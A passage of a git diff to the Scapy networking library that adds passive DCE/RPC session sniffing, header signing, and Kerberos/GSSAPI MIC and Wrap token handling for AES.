(KRB_GSS_Wrap_RFC1964, KRB_GSS_Wrap), - ) - elif self.auth_type == 0x44: - return isinstance(self.auth_value, NL_AUTH_SIGNATURE) - elif self.auth_type in [0x0A, 0xFF] and self.auth_value: - return isinstance(self.auth_value, NTLMSSP_MESSAGE_SIGNATURE) - return False + if not self.auth_value: + return False + if self.parent and self.parent.ptype in [11, 12, 13, 14, 15, 16]: + return False + return True + + def is_ssp(self): + if not self.auth_value: + return False + if self.parent and self.parent.ptype not in [11, 12, 13, 14, 15, 16]: + return False + return True def default_payload_class(self, pkt): return conf.padding_layer @@ -731,6 +751,19 @@ def getfield( 0x000006D8: "EPT_S_CANT_PERFORM_OP", } +_DCE_RPC_REJECTION_REASONS = { + 0: "REASON_NOT_SPECIFIED", + 1: "TEMPORARY_CONGESTION", + 2: "LOCAL_LIMIT_EXCEEDED", + 3: "CALLED_PADDR_UNKNOWN", + 4: "PROTOCOL_VERSION_NOT_SUPPORTED", + 5: "DEFAULT_CONTEXT_NOT_SUPPORTED", + 6: "USER_DATA_NOT_READABLE", + 7: "NO_PSAP_AVAILABLE", + 8: "AUTHENTICATION_TYPE_NOT_RECOGNIZED", + 9: "INVALID_CHECKSUM", +} + class DceRpc5(DceRpc): """ @@ -857,6 +890,13 @@ def tcp_reassemble(cls, data, _, session): return length = struct.unpack(("<" if endian else ">") + "H", data[8:10])[0] if len(data) >= length: + if conf.dcerpc_session_enable: + # If DCE/RPC sessions are enabled, use them ! + if "dcerpcsess" not in session: + session["dcerpcsess"] = dcerpcsess = DceRpcSession() + else: + dcerpcsess = session["dcerpcsess"] + return dcerpcsess.process(DceRpc5(data)) return DceRpc5(data) @@ -924,12 +964,7 @@ class DceRpc5Result(EPacket): ShortEnumField( "reason", 0, - [ - "reason_not_specified", - "abstract_syntax_not_supported", - "proposed_transfer_syntaxes_not_supported", - "local_limit_exceeded", - ], + _DCE_RPC_REJECTION_REASONS, ) ), EPacketField("transfer_syntax", None, DceRpc5TransferSyntax), @@ -1012,9 +1047,11 @@ class DceRpc5Version(EPacket): class DceRpc5BindNak(_DceRpcPayload): name = "DCE/RPC v5 - Bind Nak" fields_desc = [ - _EField(ShortField("provider_reject_reason", 0)), + _EField( + ShortEnumField("provider_reject_reason", 0, _DCE_RPC_REJECTION_REASONS) + ), # p_rt_versions_supported_t - _EField(FieldLenField("n_protocols", None, length_of="protocols", fmt="B")), + _EField(FieldLenField("n_protocols", None, count_of="protocols", fmt="B")), EPacketListField( "protocols", [], @@ -1022,6 +1059,28 @@ class DceRpc5BindNak(_DceRpcPayload): count_from=lambda pkt: pkt.n_protocols, endianness_from=_dce_rpc_endianess, ), + # [MS-RPCE] sect 2.2.2.9 + ConditionalField( + ReversePadField( + _EField( + UUIDEnumField( + "signature", + None, + { + UUID( + "90740320-fad0-11d3-82d7-009027b130ab" + ): "Extended Error", + }, + ) + ), + align=8, + ), + lambda pkt: pkt.fields.get("signature", None) + or ( + pkt.underlayer + and pkt.underlayer.frag_len >= 24 + pkt.n_protocols * 2 + 16 + ), + ), ] @@ -2495,11 +2554,18 @@ def __init__(self, *args, **kwargs): self.rpc_bind_interface = None self.ndr64 = False self.ndrendian = "little" - self.header_sign = False + self.support_header_signing = kwargs.pop("support_header_signing", True) + self.header_sign = conf.dcerpc_force_header_signing self.ssp = kwargs.pop("ssp", None) self.sspcontext = kwargs.pop("sspcontext", None) + self.auth_level = kwargs.pop("auth_level", None) + self.auth_context_id = kwargs.pop("auth_context_id", 0) self.map_callid_opnum = {} self.frags = collections.defaultdict(lambda: b"") + self.sniffsspcontexts = {} # Unfinished contexts for passive + if conf.winssps_passive: + for ssp in conf.winssps_passive: + self.sniffsspcontexts[ssp] = None super(DceRpcSession, self).__init__(*args, **kwargs) def _up_pkt(self, pkt): @@ -2521,9 +2587,6 @@ def _up_pkt(self, pkt): log_runtime.warning( "Unknown RPC interface %s. Try loading the IDL" % if_uuid ) - # If the SSP supports "Header Signing", advertise it - if self.ssp is not None and self.ssp.dcerpc_header_signing: - pkt.pfc_flags |= 0x4 # PFC_SUPPORT_HEADER_SIGN elif DceRpc5BindAck in pkt or DceRpc5AlterContextResp in pkt: # bind ack => is it NDR64 for res in pkt.results: @@ -2531,9 +2594,6 @@ def _up_pkt(self, pkt): self.ndrendian = {0: "big", 1: "little"}[pkt[DceRpc5].endian] if res.transfer_syntax.sprintf("%if_uuid%") == "NDR64": self.ndr64 = True - # Detect if "Header Signing" is in use - if pkt.pfc_flags.PFC_SUPPORT_HEADER_SIGN: - self.header_sign = True elif DceRpc5Request in pkt: # request => match opnum with callID opnum = pkt.opnum @@ -2545,6 +2605,16 @@ def _up_pkt(self, pkt): del self.map_callid_opnum[pkt.call_id] except KeyError: log_runtime.info("Unknown call_id %s in DCE/RPC session" % pkt.call_id) + # Bind / Alter request/response specific + if ( + DceRpc5Bind in pkt + or DceRpc5AlterContext in pkt + or DceRpc5BindAck in pkt + or DceRpc5AlterContextResp in pkt + ): + # Detect if "Header Signing" is in use + if pkt.pfc_flags & 0x04: # PFC_SUPPORT_HEADER_SIGN + self.header_sign = True return opnum, opts # [C706] sect 12.6.2 - Fragmentation and Reassembly @@ -2603,10 +2673,38 @@ def in_pkt(self, pkt): body = None if conf.raw_layer in pkt: body = bytes(pkt[conf.raw_layer]) + # If we are doing passive sniffing + if conf.winssps_passive: + # We have Windows SSPs, and no current context + if pkt.auth_verifier and pkt.auth_verifier.is_ssp(): + # This is a bind/alter/auth3 req/resp + for ssp in self.sniffsspcontexts: + self.sniffsspcontexts[ssp], status = ssp.GSS_Passive( + self.sniffsspcontexts[ssp], + pkt.auth_verifier.auth_value, + ) + if status == GSS_S_COMPLETE: + self.auth_level = DCE_C_AUTHN_LEVEL( + int(pkt.auth_verifier.auth_level) + ) + self.ssp = ssp + self.sspcontext = self.sniffsspcontexts[ssp] + self.sniffsspcontexts[ssp] = None + elif ( + self.sspcontext + and pkt.auth_verifier + and pkt.auth_verifier.is_protected() + and body + ): + # This is a request/response + self.ssp.GSS_Passive_set_Direction( + self.sspcontext, + IsAcceptor=DceRpc5Response in pkt, + ) if pkt.auth_verifier and pkt.auth_verifier.is_protected() and body: if self.sspcontext is None: return pkt - if self.ssp.auth_level in ( + if self.auth_level in ( RPC_C_AUTHN_LEVEL.PKT_INTEGRITY, RPC_C_AUTHN_LEVEL.PKT_PRIVACY, ): @@ -2635,7 +2733,7 @@ def in_pkt(self, pkt): pdu_header.vt_trailer = None # [MS-RPCE] sect 2.2.2.12 - if self.ssp.auth_level == RPC_C_AUTHN_LEVEL.PKT_PRIVACY: + if self.auth_level == RPC_C_AUTHN_LEVEL.PKT_PRIVACY: _msgs = self.ssp.GSS_UnwrapEx( self.sspcontext, [ @@ -2661,7 +2759,7 @@ def in_pkt(self, pkt): pkt.auth_verifier.auth_value, ) body = _msgs[1].data # PDU body - elif self.ssp.auth_level == RPC_C_AUTHN_LEVEL.PKT_INTEGRITY: + elif self.auth_level == RPC_C_AUTHN_LEVEL.PKT_INTEGRITY: self.ssp.GSS_VerifyMICEx( self.sspcontext, [ @@ -2702,6 +2800,7 @@ def in_pkt(self, pkt): "Unknown opnum %s for interface %s" % (opnum, self.rpc_bind_interface) ) + pkt[conf.raw_layer].load = body return pkt if body: # Dissect payload using class @@ -2711,6 +2810,8 @@ def in_pkt(self, pkt): elif not cls.fields_desc: # Request class has no payload pkt /= cls(ndr64=self.ndr64, ndrendian=self.ndrendian, **opts) + elif body: + pkt[conf.raw_layer].load = body return pkt def out_pkt(self, pkt): @@ -2724,7 +2825,7 @@ def out_pkt(self, pkt): ): body = bytes(pkt.payload.payload) signature = None - if self.ssp.auth_level in ( + if self.auth_level in ( RPC_C_AUTHN_LEVEL.PKT_INTEGRITY, RPC_C_AUTHN_LEVEL.PKT_PRIVACY, ): @@ -2742,9 +2843,18 @@ def out_pkt(self, pkt): # Add the auth_verifier pkt.auth_verifier = CommonAuthVerifier( auth_type=self.ssp.auth_type, - auth_level=self.ssp.auth_level, + auth_level=self.auth_level, + auth_context_id=self.auth_context_id, auth_pad_length=padlen, - auth_value=NTLMSSP_MESSAGE_SIGNATURE(), + # Note: auth_value should have the correct length because when + # using PFC_SUPPORT_HEADER_SIGN, auth_len (and frag_len) is + # included in the token.. but this creates a dependency loop as + # you'd need to know the token length to compute the token. + # Windows solves this by setting the 'Maximum Signature Length' + # (or something similar) beforehand, instead of the real length. + # See `gensec_sig_size` in samba. + auth_value=b"\x00" + * self.ssp.MaximumSignatureLength(self.sspcontext), ) # Build pdu_header and sec_trailer pdu_header = pkt.copy() @@ -2761,7 +2871,7 @@ def out_pkt(self, pkt): pdu_header.vt_trailer = None signature = None # [MS-RPCE] sect 2.2.2.12 - if self.ssp.auth_level == RPC_C_AUTHN_LEVEL.PKT_PRIVACY: + if self.auth_level == RPC_C_AUTHN_LEVEL.PKT_PRIVACY: _msgs, signature = self.ssp.GSS_WrapEx( self.sspcontext, [ @@ -2786,7 +2896,7 @@ def out_pkt(self, pkt): ], ) s = _msgs[1].data # PDU body - elif self.ssp.auth_level == RPC_C_AUTHN_LEVEL.PKT_INTEGRITY: + elif self.auth_level == RPC_C_AUTHN_LEVEL.PKT_INTEGRITY: signature = self.ssp.GSS_GetMICEx( self.sspcontext, [ @@ -2843,7 +2953,12 @@ class DceRpcSocket(StreamSocket): """ def __init__(self, *args, **kwargs): - self.session = DceRpcSession(ssp=kwargs.pop("ssp", None)) + self.session = DceRpcSession( + ssp=kwargs.pop("ssp", None), + auth_level=kwargs.pop("auth_level", None), + auth_context_id=kwargs.pop("auth_context_id", None), + support_header_signing=kwargs.pop("support_header_signing", True), + ) super(DceRpcSocket, self).__init__(*args, **kwargs) def send(self, x, **kwargs): diff --git a/scapy/layers/gssapi.py b/scapy/layers/gssapi.py index fcfc3d53459..8b1b664660a 100644 --- a/scapy/layers/gssapi.py +++ b/scapy/layers/gssapi.py @@ -6,15 +6,26 @@ """ Generic Security Services (GSS) API -Implements parts of -- GSSAPI: RFC4121 / RFC2743 -- GSSAPI C bindings: RFC2744 +Implements parts of: + + - GSSAPI: RFC4121 / RFC2743 + - GSSAPI C bindings: RFC2744 + +This is implemented in the following SSPs: + + - :class:`~scapy.layers.ntlm.NTLMSSP` + - :class:`~scapy.layers.kerberos.KerberosSSP` + - :class:`~scapy.layers.spnego.SPNEGOSSP` + - :class:`~scapy.layers.msrpce.msnrpc.NetlogonSSP` + +You can find the general GSSAPI documentation at +https://scapy.readthedocs.io/en/latest/layers/gssapi.html """ import abc from dataclasses import dataclass -from enum import IntEnum +from enum import IntEnum, IntFlag from scapy.asn1.asn1 import ( ASN1_SEQUENCE, @@ -41,6 +52,7 @@ from typing import ( Any, List, + Optional, Tuple, ) @@ -122,6 +134,19 @@ class GSSAPI_BLOB_SIGNATURE(ASN1_Packet): ), ) + @classmethod + def dispatch_hook(cls, _pkt=None, *args, **kargs): + if _pkt and len(_pkt) >= 2: + # Sometimes the token is raw. Detect that with educated + # heuristics. + if _pkt[:2] in [b"\x04\x04", b"\x05\x04"]: + from scapy.layers.kerberos import KRB_InnerToken + return KRB_InnerToken + elif len(_pkt) >= 4 and _pkt[:4] == b"\x01\x00\x00\x00": + from scapy.layers.ntlm import NTLMSSP_MESSAGE_SIGNATURE + return NTLMSSP_MESSAGE_SIGNATURE + return cls + # RFC2744 sect 3.9 - Status Values @@ -230,18 +255,32 @@ class GssChannelBindings(Packet): # --- The base GSSAPI SSP base class +class GSS_C_FLAGS(IntFlag): + """ + Authenticator Flags per RFC2744 req_flags + """ + GSS_C_DELEG_FLAG = 0x01 + GSS_C_MUTUAL_FLAG = 0x02 + GSS_C_REPLAY_FLAG = 0x04 + GSS_C_SEQUENCE_FLAG = 0x08 + GSS_C_CONF_FLAG = 0x10 # confidentiality + GSS_C_INTEG_FLAG = 0x20 # integrity + # RFC4757 + GSS_C_DCE_STYLE = 0x1000 + GSS_C_IDENTIFY_FLAG = 0x2000 + GSS_C_EXTENDED_ERROR_FLAG = 0x4000 + + class SSP: """ The general SSP class """ - __slots__ = ["auth_level"] - auth_type = 0x00 - dcerpc_header_signing = True - def __init__(self, auth_level=None): - self.auth_level = auth_level + def __init__(self, **kwargs): + if kwargs: + raise ValueError("Unknown SSP parameters: " + ",".join(list(kwargs))) def __repr__(self): return "<%s>" % self.__class__.__name__ @@ -251,10 +290,17 @@ class CONTEXT: A Security context i.e. the 'state' of the secure negotiation """ - __slots__ = ["state"] + __slots__ = ["state", "flags", "passive"] - def __init__(self): - raise NotImplementedError + def __init__(self, req_flags: Optional[GSS_C_FLAGS] = None): + if req_flags is None: + # Default + req_flags = ( + GSS_C_FLAGS.GSS_C_EXTENDED_ERROR_FLAG | + GSS_C_FLAGS.GSS_C_MUTUAL_FLAG + ) + self.flags = req_flags + self.passive = False def __repr__(self): return "[Default SSP]" @@ -265,7 +311,8 @@ class STATE(IntEnum): """ @abc.abstractmethod - def GSS_Init_sec_context(self, Context: CONTEXT, val=None): + def GSS_Init_sec_context(self, Context: CONTEXT, val=None, + req_flags: Optional[GSS_C_FLAGS] = None): """ GSS_Init_sec_context: client-side call for the SSP """ @@ -278,6 +325,21 @@ def GSS_Accept_sec_context(self, Context: CONTEXT, val=None): """ raise NotImplementedError + # Passive + + @abc.abstractmethod + def GSS_Passive(self, Context: CONTEXT, val=None): + """ + GSS_Passive: client/server call for the SSP in passive mode + """ + raise NotImplementedError + + def GSS_Passive_set_Direction(self, Context: CONTEXT, IsAcceptor=False): + """ + GSS_Passive_set_Direction: used to swap the direction in passive mode + """ + pass + # MS additions (*Ex functions) @dataclass @@ -346,12 +408,22 @@ def GSS_VerifyMICEx(self, Context: CONTEXT, msgs: List[MIC_MSG], signature) -> N """ raise NotImplementedError + @abc.abstractmethod + def MaximumSignatureLength(self, Context: CONTEXT): + """ + Returns the Maximum Signature length. + + This will be used in auth_len in DceRpc5, and is necessary for + PFC_SUPPORT_HEADER_SIGN to work properly. + """ + raise NotImplementedError + # RFC 2743 # sect 2.3.1 def GSS_GetMIC(self, Context: CONTEXT, message: bytes, qop_req: int = 0): - return self.GSS_WrapEx( + return self.GSS_GetMICEx( Context, [ self.MIC_MSG( @@ -401,7 +473,7 @@ def GSS_Wrap( # sect 2.3.4 def GSS_Unwrap(self, Context: CONTEXT, input_message: bytes): - return self.GSS_WrapEx( + return self.GSS_UnwrapEx( Context, [ self.WRAP_MSG( @@ -427,10 +499,22 @@ def canMechListMIC(self, Context: CONTEXT): """ return False + def getMechListMIC(self, Context, input): + """ + Compute mechListMIC + """ + return bytes(self.GSS_GetMIC(Context, input)) + + def verifyMechListMIC(self, Context, otherMIC, input): + """ + Verify mechListMIC + """ + return self.GSS_VerifyMIC(Context, input, otherMIC) + def LegsAmount(self, Context: CONTEXT): """ Returns the amount of 'legs' (how MS calls it) of the SSP. - i.e. 2 for Kerberos, 3 for NTLM + i.e. 2 for Kerberos, 3 for NTLM and Netlogon """ return 2 diff --git a/scapy/layers/kerberos.py b/scapy/layers/kerberos.py index 598346ddbc3..7c8d7f36718 100644 --- a/scapy/layers/kerberos.py +++ b/scapy/layers/kerberos.py @@ -87,16 +87,15 @@ from scapy.compat import bytes_encode from scapy.error import log_runtime from scapy.fields import ( - ByteField, ConditionalField, FieldLenField, FlagsField, IntEnumField, LEIntEnumField, - LEIntField, LenField, LEShortEnumField, LEShortField, + LongField, MultipleTypeField, PacketField, PacketLenField, @@ -107,31 +106,42 @@ StrField, StrFieldUtf16, StrFixedLenEnumField, + XByteField, XLEIntField, + XLEShortField, XStrFixedLenField, XStrLenField, + XStrField, ) from scapy.packet import Packet, bind_bottom_up, bind_top_down, bind_layers from scapy.supersocket import StreamSocket +from scapy.utils import strrot from scapy.volatile import GeneralizedTime, RandNum, RandBin from scapy.layers.gssapi import ( - SSP, - _GSSAPI_OIDS, - _GSSAPI_SIGNATURE_OIDS, GSSAPI_BLOB, + GSS_C_FLAGS, + GSS_S_BAD_MECH, GSS_S_COMPLETE, - GSS_S_DEFECTIVE_TOKEN, GSS_S_CONTINUE_NEEDED, - GSS_S_BAD_MECH, + GSS_S_DEFECTIVE_TOKEN, GSS_S_FAILURE, GssChannelBindings, + SSP, + _GSSAPI_OIDS, + _GSSAPI_SIGNATURE_OIDS, ) from scapy.layers.inet import TCP, UDP +# Typing imports +from typing import ( + Optional, +) + # kerberos APPLICATION + class ASN1_Class_KRB(ASN1_Class): name = "Kerberos" # APPLICATION + CONSTRUCTED = 0x40 | 0x20 @@ -2076,12 +2086,12 @@ class KRB_GSSAPI_Token(GSSAPI_BLOB): # RFC 1964 - sect 1.2.1 -class KRB_GSS_GetMIC_RFC1964(Packet): - name = "Kerberos v5 GSS_GetMIC (RFC1964)" +class KRB_GSS_MIC_RFC1964(Packet): + name = "Kerberos v5 MIC Token (RFC1964)" fields_desc = [ LEShortEnumField("SGN_ALG", 0, _SGN_ALGS), - LEIntField("reserved", 0xFFFFFFFF), - XStrFixedLenField("SND_SEQ", b"", length=8), + XLEIntField("Filler", 0xFFFFFFFF), + LongField("SND_SEQ", 0), PadField( # sect 1.2.2.3 XStrFixedLenField("SGN_CKSUM", b"", length=8), align=8, @@ -2090,7 +2100,7 @@ class KRB_GSS_GetMIC_RFC1964(Packet): ] -_InitialContextTokens[b"\x01\x01"] = KRB_GSS_GetMIC_RFC1964 +_InitialContextTokens[b"\x01\x01"] = KRB_GSS_MIC_RFC1964 # RFC 1964 - sect 1.2.2 @@ -2100,8 +2110,8 @@ class KRB_GSS_Wrap_RFC1964(Packet): fields_desc = [ LEShortEnumField("SGN_ALG", 0, _SGN_ALGS), LEShortEnumField("SEAL_ALG", 0, _SEAL_ALGS), - LEShortField("reserved", 0xFFFF), - XStrFixedLenField("SND_SEQ", b"", length=8), + XLEShortField("Filler", 0xFFFF), + LongField("SND_SEQ", 0), PadField( # sect 1.2.2.3 XStrFixedLenField("SGN_CKSUM", b"", length=8), align=8, @@ -2120,7 +2130,7 @@ class KRB_GSS_Wrap_RFC1964(Packet): class KRB_GSS_Delete_sec_context_RFC1964(Packet): name = "Kerberos v5 GSS_Delete_sec_context (RFC1964)" - fields_desc = KRB_GSS_GetMIC_RFC1964.fields_desc + fields_desc = KRB_GSS_MIC_RFC1964.fields_desc _InitialContextTokens[b"\x01\x02"] = KRB_GSS_Delete_sec_context_RFC1964 @@ -2137,39 +2147,31 @@ class KRB_GSS_Delete_sec_context_RFC1964(Packet): # RFC 4121 - sect 4.2.6.1 -class KRB_GSS_GetMIC(Packet): - name = "Kerberos v5 GSS_GetMIC" +class KRB_GSS_MIC(Packet): + name = "Kerberos v5 MIC Token" fields_desc = [ - FlagsField("Flags", 8, 0, _KRB5_GSS_Flags), - LEIntField("reserved", 0xFFFFFFFF), - XStrFixedLenField("SND_SEQ", b"", length=8), - PadField( - XStrFixedLenField("SGN_CKSUM", b"", length=8), - align=8, - padwith=b"\x04", - ), + FlagsField("Flags", 0, 8, _KRB5_GSS_Flags), + XStrFixedLenField("Filler", b"\xff\xff\xff\xff\xff", length=5), + LongField("SND_SEQ", 0), # Big endian + XStrField("SGN_CKSUM", b"\x00" * 12), ] -_InitialContextTokens[b"\x04\x04"] = KRB_GSS_GetMIC +_InitialContextTokens[b"\x04\x04"] = KRB_GSS_MIC # RFC 4121 - sect 4.2.6.2 class KRB_GSS_Wrap(Packet): - name = "Kerberos v5 GSS_Wrap" + name = "Kerberos v5 Wrap Token" fields_desc = [ - FlagsField("Flags", 8, 0, _KRB5_GSS_Flags), - ByteField("reserved", 0xFF), + FlagsField("Flags", 0, 8, _KRB5_GSS_Flags), + XByteField("Filler", 0xFF), ShortField("EC", 0), # Big endian ShortField("RRC", 0), # Big endian - XStrFixedLenField("SND_SEQ", b"", length=8), - PadField( - XStrFixedLenField("SGN_CKSUM", b"", length=8), - align=8, - padwith=b"\x04", - ), + LongField("SND_SEQ", 0), # Big endian + XStrField("Data", b""), ] @@ -2619,11 +2621,8 @@ def tgs_req(self): if self.u2u: # U2U kdc_req.kdcOptions.set(28, 1) # set 'enc-tkt-in-skey' (bit 28) - kdc_req.sname = PrincipalName.fromUPN(self.upn) - else: - # RFC 4120 sect 6.1 - # TODO: support XHST and other principals :D - kdc_req.sname = PrincipalName.fromSPN(self.spn) + + kdc_req.sname = PrincipalName.fromSPN(self.spn) tgsreq = Kerberos( root=KRB_TGS_REQ( @@ -3061,11 +3060,13 @@ def kpasswd( ST=ticket, KEY=key, DC_IP=ip, - MUTUAL=False, debug=debug, **kwargs, ) - Context, tok, negResult = ssp.GSS_Init_sec_context(None) + Context, tok, negResult = ssp.GSS_Init_sec_context( + None, + req_flags=0, # No GSS_C_MUTUAL_FLAG + ) if negResult != GSS_S_CONTINUE_NEEDED: warning("SSP failed on initial GSS_Init_sec_context !") if tok: @@ -3106,7 +3107,7 @@ def kpasswd( ), timestamp=None, usec=None, - seqNumber=Context.SeqNum, + seqNumber=Context.SendSeqNum, ), ) resp = sock.sr1( @@ -3163,6 +3164,7 @@ class KerberosSSP(SSP): OR the kerberos key associated with the UPN :param PASSWORD: (optional) if a UPN is provided and not a KEY, this is the password of the UPN. + :param U2U: (optional) use U2U when requesting the ST. Server settings: @@ -3179,24 +3181,54 @@ class KerberosSSP(SSP): class STATE(SSP.STATE): INIT = 1 - CLI_SENT_APREQ = 2 - CLI_RCVD_APREP = 3 - SRV_SENT_APREP = 4 + CLI_SENT_TGTREQ = 2 + CLI_SENT_APREQ = 3 + CLI_RCVD_APREP = 4 + SRV_SENT_APREP = 5 class CONTEXT(SSP.CONTEXT): __slots__ = [ "SessionKey", "ServerHostname", - "KrbSessionKey", # raw Key object, set by client - "SeqNum", + "U2U", + "KrbSessionKey", # raw Key object + "STSessionKey", # raw ST Key object (for DCE_STYLE) + "SeqNum", # for AP + "SendSeqNum", # for MIC + "RecvSeqNum", # for MIC + "IsAcceptor", + "SendSealKeyUsage", + "SendSignKeyUsage", + "RecvSealKeyUsage", + "RecvSignKeyUsage", ] - def __init__(self): + def __init__(self, IsAcceptor, req_flags=None): self.state = KerberosSSP.STATE.INIT self.SessionKey = None self.ServerHostname = None + self.U2U = False + self.SendSeqNum = 0 + self.RecvSeqNum = 0 + self.KrbSessionKey = None + self.STSessionKey = None + self.IsAcceptor = IsAcceptor + # [RFC 4121] sect 2 + if IsAcceptor: + self.SendSealKeyUsage = 22 + self.SendSignKeyUsage = 23 + self.RecvSealKeyUsage = 24 + self.RecvSignKeyUsage = 25 + else: + self.SendSealKeyUsage = 24 + self.SendSignKeyUsage = 25 + self.RecvSealKeyUsage = 22 + self.RecvSignKeyUsage = 23 + super(KerberosSSP.CONTEXT, self).__init__(req_flags=req_flags) def __repr__(self): + if self.U2U: + return "KerberosSSP-U2U" return "KerberosSSP" def __init__( @@ -3204,12 +3236,12 @@ def __init__( ST=None, UPN=None, PASSWORD=None, + U2U=False, KEY=None, SPN=None, TGT=None, DC_IP=None, REQUIRE_U2U=False, - MUTUAL=True, debug=0, **kwargs, ): @@ -3219,30 +3251,199 @@ def __init__( self.SPN = SPN self.TGT = TGT self.PASSWORD = PASSWORD + self.U2U = U2U self.DC_IP = DC_IP self.REQUIRE_U2U = REQUIRE_U2U - self.MUTUAL = MUTUAL self.debug = debug super(KerberosSSP, self).__init__(**kwargs) - def _setup_u2u(self): - if not self.TGT: - # Get a TGT for ourselves - try: - upn = "@".join(self.SPN.split("/")[1].split(".", 1)) - except KeyError: - raise ValueError("Couldn't transform the SPN into a valid UPN") - res = krb_as_req(upn, self.DC_IP, key=self.KEY) - self.TGT, self.KEY = res.asrep.ticket, res.sessionkey + def GSS_GetMICEx(self, Context, msgs, qop_req=0): + """ + [MS-KILE] sect 3.4.5.6 + + - AES: RFC4121 sect 4.2.6.1 + """ + if Context.KrbSessionKey.etype in [17, 18]: # AES + # Concatenate the ToSign + ToSign = b"".join(x.data for x in msgs if x.sign) + sig = KRB_InnerToken( + TOK_ID=b"\x04\x04", + root=KRB_GSS_MIC( + Flags="AcceptorSubkey" + + ("+SentByAcceptor" if Context.IsAcceptor else ""), + SND_SEQ=Context.SendSeqNum, + ), + ) + ToSign += bytes(sig)[:16] + sig.root.SGN_CKSUM = Context.KrbSessionKey.make_checksum( + keyusage=Context.SendSignKeyUsage, + text=ToSign, + ) + else: + raise NotImplementedError + Context.SendSeqNum += +1 + return sig + + def GSS_VerifyMICEx(self, Context, msgs, signature): + """ + [MS-KILE] sect 3.4.5.7 + + - AES: RFC4121 sect 4.2.6.1 + """ + Context.RecvSeqNum = signature.root.SND_SEQ + if Context.KrbSessionKey.etype in [17, 18]: # AES + # Concatenate the ToSign + ToSign = b"".join(x.data for x in msgs if x.sign) + ToSign += bytes(signature)[:16] + sig = Context.KrbSessionKey.make_checksum( + keyusage=Context.RecvSignKeyUsage, + text=ToSign, + ) + else: + raise NotImplementedError + if sig != signature.root.SGN_CKSUM: + raise ValueError("ERROR: Checksums don't match") + + def GSS_WrapEx(self, Context, msgs, qop_req=0): + """ + [MS-KILE] sect 3.4.5.4 + + - AES: RFC4121 sect 4.2.6.2 and [MS-KILE] sect 3.4.5.4.1 + """ + if Context.KrbSessionKey.etype in [17, 18]: # AES + confidentiality = Context.flags & GSS_C_FLAGS.GSS_C_CONF_FLAG + # Concatenate the data + Data = b"".join(x.data for x in msgs if x.sign or x.conf_req_flag) + DataLen = len(Data) + # Build token + tok = KRB_InnerToken( + TOK_ID=b"\x05\x04", + root=KRB_GSS_Wrap( + Flags="AcceptorSubkey" + + ("+SentByAcceptor" if Context.IsAcceptor else "") + + ("+Sealed" if confidentiality else ""), + SND_SEQ=Context.SendSeqNum, + RRC=0, + ), + ) + # Real separation starts now: RFC4121 sect 4.2.4 + if confidentiality: + # Confidentiality is requested (see RFC4121 sect 4.3) + # {"header" | encrypt(plaintext-data | filler | "header")} + # 1. Add filler + tok.root.EC = (-DataLen) % Context.KrbSessionKey.ep.blocksize + Data += b"\x00" * tok.root.EC + # 2. Add first 16 octets of the Wrap token "header" + Data += bytes(tok)[:16] + # 3. encrypt() is the encryption operation (which provides for + # integrity protection) + Data = Context.KrbSessionKey.encrypt( + keyusage=Context.SendSealKeyUsage, + plaintext=Data, + ) + # "The RRC field is [...] 28 if encryption is requested." + tok.root.RRC = 28 + # 4. Rotate + Data = strrot(Data, tok.root.RRC + tok.root.EC) + # 5. Split (token and encrypted messages) + toklen = len(Data) - DataLen + tok.root.Data = Data[:toklen] + offset = toklen + for msg in msgs: + msglen = len(msg.data) + if msg.conf_req_flag: + msg.data = Data[offset : offset + msglen] + if msg.sign or msg.conf_req_flag: + offset += msglen + return msgs, tok + else: + # No confidentiality is requested + # {"header" | plaintext-data | get_mic(plaintext-data | "header")} + raise NotImplementedError + # 1. Add first 16 octets of the Wrap token "header" + Data += bytes(tok)[:16] + # 2. get_mic() is the checksum operation for the required + # checksum mechanism + # XXX broken, bad 0404 should be 0504 XXX FIXME + tok.root.Data = self.GSS_GetMIC(Context, Data, qop_req=qop_req) + # "The RRC field is 12 if no encryption is requested" + tok.root.RRC = 12 + # In Wrap tokens without confidentiality, the EC field SHALL be used + # to encode the number of octets in the trailing checksum + tok.root.EC = 12 # len(tok.root.Data) == 12 for AES + return msgs, tok + else: + raise NotImplementedError + + def GSS_UnwrapEx(self, Context, msgs, signature): + """ + [MS-KILE] sect 3.4.5.5 + + - AES: RFC4121 sect 4.2.6.2 + """ + if Context.KrbSessionKey.etype in [17, 18]: # AES + confidentiality = Context.flags & GSS_C_FLAGS.GSS_C_CONF_FLAG + # Concatenate the data + Data = signature.root.Data + Data += b"".join(x.data for x in msgs if x.sign or x.conf_req_flag) + # Real separation starts now: RFC4121 sect 4.2.4 + if confidentiality: + # 1. Un-Rotate + Data = strrot(Data, signature.root.RRC + signature.root.EC, right=False) + # 2. Decrypt + Data = Context.KrbSessionKey.decrypt( + keyusage=Context.RecvSealKeyUsage, + ciphertext=Data, + ) + # 3. Split + Data, f16header = ( + Data[:-16], + Data[-16:], + ) + # 4. Check header + hdr = signature.copy() + hdr.root.RRC = 0 + if f16header != bytes(hdr)[:16]: + raise ValueError("ERROR: Headers don't match") + # 5. Split (and ignore filler) + offset = 0 + for msg in msgs: + msglen = len(msg.data) + if msg.conf_req_flag: + msg.data = Data[offset : offset + msglen] + if msg.sign or msg.conf_req_flag: + offset += msglen + return msgs + else: + raise NotImplementedError + else: + raise NotImplementedError - def GSS_Init_sec_context(self, Context: CONTEXT, val=None): + def GSS_Init_sec_context( + self, Context: CONTEXT, val=None, req_flags: Optional[GSS_C_FLAGS] = None + ): if Context is None: # New context - Context = self.CONTEXT() + Context = self.CONTEXT(IsAcceptor=False, req_flags=req_flags) from scapy.libs.rfc3961 import Key, EncryptionType - if Context.state == self.STATE.INIT: + if Context.state == self.STATE.INIT and self.U2U: + # U2U - Get TGT + Context.state = self.STATE.CLI_SENT_TGTREQ + return ( + Context, + KRB_GSSAPI_Token( + MechType="1.2.840.113554.1.2.2.3", # U2U + innerToken=KRB_InnerToken( + TOK_ID=b"\x04\x00", + root=KRB_TGT_REQ(), + ), + ), + GSS_S_CONTINUE_NEEDED, + ) + + if Context.state in [self.STATE.INIT, self.STATE.CLI_SENT_TGTREQ]: if not self.UPN: raise ValueError("Missing UPN attribute") # Do we have a ST? @@ -3250,6 +3451,21 @@ def GSS_Init_sec_context(self, Context: CONTEXT, val=None): # Client sends an AP-req if not self.SPN: raise ValueError("Missing SPN attribute") + additional_tickets = [] + if self.U2U: + try: + # GSSAPI / Kerberos + tgt_rep = val.root.innerToken.root + except AttributeError: + try: + # Kerberos + tgt_rep = val.innerToken.root + except AttributeError: + return Context, None, GSS_S_DEFECTIVE_TOKEN + if not isinstance(tgt_rep, KRB_TGT_REP): + tgt_rep.show() + raise 